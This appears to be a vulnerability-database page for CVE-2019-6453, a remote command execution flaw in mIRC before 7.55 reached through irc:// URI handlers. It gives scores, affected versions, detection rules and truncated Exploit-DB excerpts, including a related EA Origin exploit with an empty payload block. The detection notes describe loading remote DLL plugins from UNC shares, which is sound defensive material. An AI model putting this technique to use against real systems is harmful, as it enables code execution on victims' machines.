CVE-2019-6453
published 2019-02-18CVE-2019-6453: mIRC before 7.55 allows remote command execution by using argument injection through custom URI protocol handlers. The attacker can specify an irc:// URI that…
PriorityP271high8.1CVSS 3.0
AVNACHPRNUINSUCHIHAH
EXPLOIT
EPSS
71.78%
99.3th percentile
mIRC before 7.55 allows remote command execution by using argument injection through custom URI protocol handlers. The attacker can specify an irc:// URI that loads an arbitrary .ini file from a UNC share pathname. Exploitation depends on browser-specific URI handling (Chrome is not exploitable).
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| mirc | mirc | < 7.55 | 7.55 |
Detection & IOCsextracted from sources · hover to see the quote
- →mIRC CVE-2019-6453 is exploitable via irc:// URI handlers loading arbitrary .ini files from UNC share pathnames; monitor for mIRC process launches with UNC path arguments (\\server\share\*.ini). ↗
- →Monitor for Origin.exe or mIRC.exe spawned with -platformpluginpath pointing to a UNC/remote Windows share path, which indicates remote DLL plugin loading for code execution. ↗
- →Alert on process creation events where Origin.exe is launched with /noUpdate and /StartClientMinimized flags combined, as this is a known evasion pattern used in exploitation. ↗
- →CVE-2019-6453 exploitation does not work on Chrome (URI is encoded before being passed to the application); focus detection on Edge and Firefox browser process trees spawning mIRC or Origin. ↗
- →Monitor SMB/UNC share access (\\<remote>\imageformats\*.dll) initiated by Origin.exe or mIRC.exe, indicating remote Qt plugin loading as part of exploitation. ↗
- ·Exploitation of CVE-2019-6453 is browser-dependent: Chrome encodes URIs before passing to the application, preventing argument injection. Edge and Firefox are confirmed vulnerable. ↗
- ·The vulnerability affects mIRC versions prior to 7.55 only; patched in 7.55. ↗
- ·Remote Qt plugin loading requires the backdoored DLL to reside within a valid Qt plugin subdirectory (e.g., imageformats/) on the remote share; a valid .qtmetad section is required for the DLL to be loaded. ↗
CVSS provenance
nvdv3.08.1HIGHCVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.06.8MEDIUMAV:N/AC:M/Au:N/C:P/I:P/A:P
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
EA Origin < 10.5.38 - Remote Code Execution
exploitdb·2019-06-21·CVSS 7.8
CVE-2019-12828 [HIGH] EA Origin < 10.5.38 - Remote Code Execution
EA Origin
```
You can read more about how that exploit was discovered and exploited here:
[https://proofofcalc.com/cve-2019-6453-mIRC/](https://proofofcalc.com/cve-2019-6453-mIRC/)
Anyways, for this example with Origin, we're just going to spin up a fresh Windows 8 box and use IE11. We'll talk more about bypassing modern security mechanisms later.
## The Payload
So now that we've spun up our virtual machine, make sure you have Origin installed. Open a notepad, and paste the following:
```
```
Open it in Internet Explorer, and allow Origin to launch (if it even prompts, lol). You should see the following.
[](https://zeropwn.github.io/assets/origin_reverse.png)
As you can see in the image above, the window icons are now loading in reverse. I failed to mention this, however "-revers
Exploit-DB
mIRC < 7.55 - 'Custom URI Protocol Handlers' Remote Command Execution
exploitdb·2019-02-18·CVSS 8.1
CVE-2019-6453 [HIGH] mIRC < 7.55 - 'Custom URI Protocol Handlers' Remote Command Execution
mIRC
Affected versions
This PoC runs for mIRC <7.55.
You can trigger the PoC on Edge 42.17134 (last preview version) and
Firefox 64.0.2
(last release). It doesn't work on Chrome because the way Chrome handle
URI protocols
(URI is encoded before being passed to the application).
References
Further explanation (including proof of concept code):
Write-up:
https://proofofcalc.com/cve-2019-6453-mIRC/
PoC:
https://github.com/proofofcalc/cve-2019-6453-poc
mIRC changelog:
https://www.mirc.com/whatsnew.txt
Authors
Baptiste Devigne (Geluchat) and Benjamin Chetioui (SIben)
No writeups or analysis indexed.
https://github.com/proofofcalc/cve-2019-6453-pochttps://proofofcalc.com/advisories/20190218.txthttps://proofofcalc.com/cve-2019-6453-mIRC/https://twitter.com/proofofcalc/status/1097518413143003136https://www.exploit-db.com/exploits/46392/https://www.mirc.com/news.htmlhttps://github.com/proofofcalc/cve-2019-6453-pochttps://proofofcalc.com/advisories/20190218.txthttps://proofofcalc.com/cve-2019-6453-mIRC/https://twitter.com/proofofcalc/status/1097518413143003136https://www.exploit-db.com/exploits/46392/https://www.mirc.com/news.html
2019-02-18
Published